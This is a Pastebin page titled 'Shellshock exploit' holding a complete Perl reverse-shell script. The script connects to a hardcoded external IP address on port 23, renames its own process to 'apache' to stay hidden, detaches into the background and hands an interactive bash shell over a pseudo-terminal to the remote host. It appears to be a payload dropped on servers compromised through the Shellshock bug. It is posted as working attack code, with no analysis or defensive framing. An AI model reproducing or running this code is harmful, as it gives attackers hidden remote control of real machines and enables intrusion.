SHARE
TWEET

Shellshock exploit

a guest Sep 25th, 2014 721 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl -w
  2.  
  3. use IO::Socket;
  4. use Fcntl;
  5.  
  6. # IOCTLs
  7. $TIOCGPTN = -2147199952;
  8. $TIOCSPTLCK = 1074025521;
  9. $EAGAIN=11;
  10.  
  11. print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n";
  12.  
  13. $HOST="72.167.37.182";
  14. $PORT="23";
  15.  
  16. $0="apache";
  17.  
  18. print "Connecting to $HOST:$PORT... ";
  19.  
  20. $sock = new IO::Socket::INET (
  21.         PeerAddr => $HOST,
  22.         PeerPort => $PORT,
  23.         Proto => 'tcp',
  24.         Blocking => 0,
  25. ) or die $!;
  26.  
  27. print "ok\nAllocatig pseudo terminal... ";
  28.  
  29. ## ptsname
  30. sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!;
  31. $tmp='';
  32. ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
  33. $pts = unpack('i', $tmp);
  34.  
  35. print "/dev/pts/$pts\nInitializing pseudo terminal... ";
  36.  
  37. ## grantpt not needed on devpts
  38.  
  39. ## unlockpt
  40. $unlock=pack('i', 0);
  41. ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;
  42.  
  43. ## prepare daemonizing
  44. chdir '/' or die $!;
  45. open STDIN, '/dev/null' or die $!;
  46. umask 0;
  47.  
  48. print "ok\nForking shell thread...";
  49.  
  50. defined($pid = fork) or die $!;
  51. exit if $pid;
  52. defined($pid = fork) or die $!;
  53. if (!$pid) {
  54.         exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
  55.         exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
  56.         die $!;
  57.         exit;
  58. }        
  59.  
  60. print "ok\nHave fun!\n";
  61.  
  62. open STDOUT, '>>/dev/null' or die $!;
  63. open STDERR, '>>/dev/null' or die $!;
  64.  
  65. $pp = PTMX;
  66. $rin=$win=$ein='';
  67. vec($rin,fileno($pp),1) =1;
  68. vec($rin,fileno($sock),1) = 1;
  69.  
  70. select $sock;
  71. $|=1;
  72. select PTMX;
  73. $|=1;
  74. select STDOUT;
  75. $|=1;
  76. $finished=0;
  77.  
  78. sub forwarddata {
  79.         my ($from,$to) = @_;
  80.         while(1) {
  81.                 $rv = sysread($from, $buff, 1024);
  82.                 last if (!defined($rv) && $! == $EAGAIN);      
  83.                 defined($rv) or die $!;
  84.                 if ($rv == 0) { $finished = 1; last;}
  85.                 while(length $buff > 0) {
  86.                         $rv = syswrite($to, $buff, length $buff);
  87.                         if (!defined($rv) && $! == $EAGAIN) {
  88.                                 ## try again
  89.                                 next;
  90.                         }
  91.                         defined($rv) or die $!;
  92.                         last if ($rv == length $buff);
  93.                         substr($buff,0,$rv) = '';
  94.                 }
  95.         }
  96. }
  97.  
  98. while(! $finished) {
  99.         $nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef);
  100.         die $! if ($nfound == -1);
  101.         forwarddata($pp,$sock);
  102.         last if $finished;
  103.         forwarddata($sock,$pp);
  104.         last if $finished;
  105. }
  106. close PTMX;
  107. close $sock;
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top